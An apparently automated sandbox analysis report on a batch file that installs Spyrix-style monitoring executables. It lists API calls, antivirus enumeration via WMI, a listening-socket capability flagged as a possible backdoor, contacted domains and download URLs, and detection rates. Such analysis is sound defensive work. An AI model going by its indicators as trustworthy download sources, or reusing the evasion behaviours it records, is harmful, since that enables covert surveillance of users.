Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0337D280 GetLocalTime,

56_2_0337D280

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0337611A GetVersion,

56_2_0337611A

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: der\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntivirusProduct

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_003752B0 setsockopt,_errno,_errno,_errno,strlen,memset,strncmp,strncmp,htons,WSAGetLastError,setsockopt,WSAIoctl,WSAGetLastError,strchr,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,WSAGetLastError,connect,htons,atoi,

71_2_003752B0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
167.114.14.168	swtb-download.spyrix-sfk.com	Canada	16276	OVHFR	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
158.69.117.119	spyrix.net	Canada	16276	OVHFR	false
142.250.181.228	www.google.com	United States	15169	GOOGLEUS	false
167.114.14.170	cdnbaynet.com	Canada	16276	OVHFR	false
95.181.182.182	cl-e0469d03.edgecdn.ru	Russian Federation	200557	REGION40RU	false
23.109.93.100	filedn.com	Netherlands	7979	SERVERS-COMUS	false

Private

IP
192.168.2.8
127.0.0.1

Contacted Domains

Name	IP	Active
swtb-download.spyrix-sfk.com	167.114.14.168	true
spyrix.net	158.69.117.119	true
dashboard.spyrix.com	158.69.117.119	true
www.google.com	142.250.181.228	true
filedn.com	23.109.93.100	true
cl-e0469d03.edgecdn.ru	95.181.182.182	true
cdnbaynet.com	167.114.14.170	true
cdn.cdndownload.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://Spyrix.net/dashboard/prg-list	false
https://spyrix.net/dashboard/prg-actions	false
https://dashboard.spyrix.com/cdn.js	false
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js	false
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css	false
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	false
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js	false
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2	false
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js	false
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js	false
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css	false
https://cdn.cdndownload.net/dashboard30/assets/en-5393c481.js	false
https://cdn.cdndownload.net/dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js	false
https://cdn.cdndownload.net/dashboard30/assets/Button.module-6d4e91b8.js	false
https://cdn.cdndownload.net/dashboard30/assets/ButtonText-ead06ca1.css	false
https://cdn.cdndownload.net/dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js	false

AV Detection

Multi AV Scanner detection for submitted file

Source: D0WmCTD2qO.bat	ReversingLabs: Detection: 26%
Source: D0WmCTD2qO.bat	Virustotal: Detection: 20%			Perma Link

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0038C770 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	71_2_0038C770
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00389BC0 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	71_2_00389BC0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00389D10 memcpy,memmove,memset,CertFreeCertificateContext,WSAGetLastError,strtol,strchr,strlen,strncpy,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertFreeCertificateContext,strchr,strlen,CertOpenStore,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,GetLastError,CertFreeCertificateContext,	71_2_00389D10

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: -----BEGIN PUBLIC KEY-----		71_2_00388FA0
Source: qrl.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

HTML body contains low number of good links

Source: https://dashboard.spyrix.com/login

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML title does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: Title: Welcome Back does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="author".. found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="copyright".. found

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49720 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49725 version: TLS 1.2

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040AC68 FindFirstFileW,FindClose,	56_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	56_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033775E8 FindFirstFileA,	56_2_033775E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033776C4 FindFirstFileA,GetLastError,	56_2_033776C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, edx	71_2_0037B510
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp dword ptr [edi+04h], ebp	71_2_003748F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	71_2_003D5060
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push esi	71_2_003720F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then add eax, dword ptr [ecx+10h]	71_2_003DC0F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ecx, eax	71_2_003CF270
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00376370
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edi, dword ptr [ebx]	71_2_00377360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov byte ptr [edx], cl	71_2_003B5360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [ebx]	71_2_003833B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003774E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377641
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 0000000Ch	71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000019h	71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003776C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377771
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_0037774F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003777DB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377828
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_0037785D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003778AB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [edi-04h]	71_2_003CE8A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377924
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377959
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003779B7
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	71_2_003959E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [edi]	71_2_00365A00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377A5E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377A9B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	71_2_00388AE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, ebp	71_2_0038DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	71_2_0038DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377BAC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377B8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	71_2_00388BD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp esi, edi	71_2_003B6C00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [esi]	71_2_003A3C90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edx, dword ptr [esp+74h]	71_2_0038BD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377D8F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebp, dword ptr [ebx+58h]	71_2_003CADE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [edi]	71_2_003B8EF0

Networking

Uses netstat to query active network connections and open ports

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6 HTTP/1.1Host: filedn.comConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49720 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
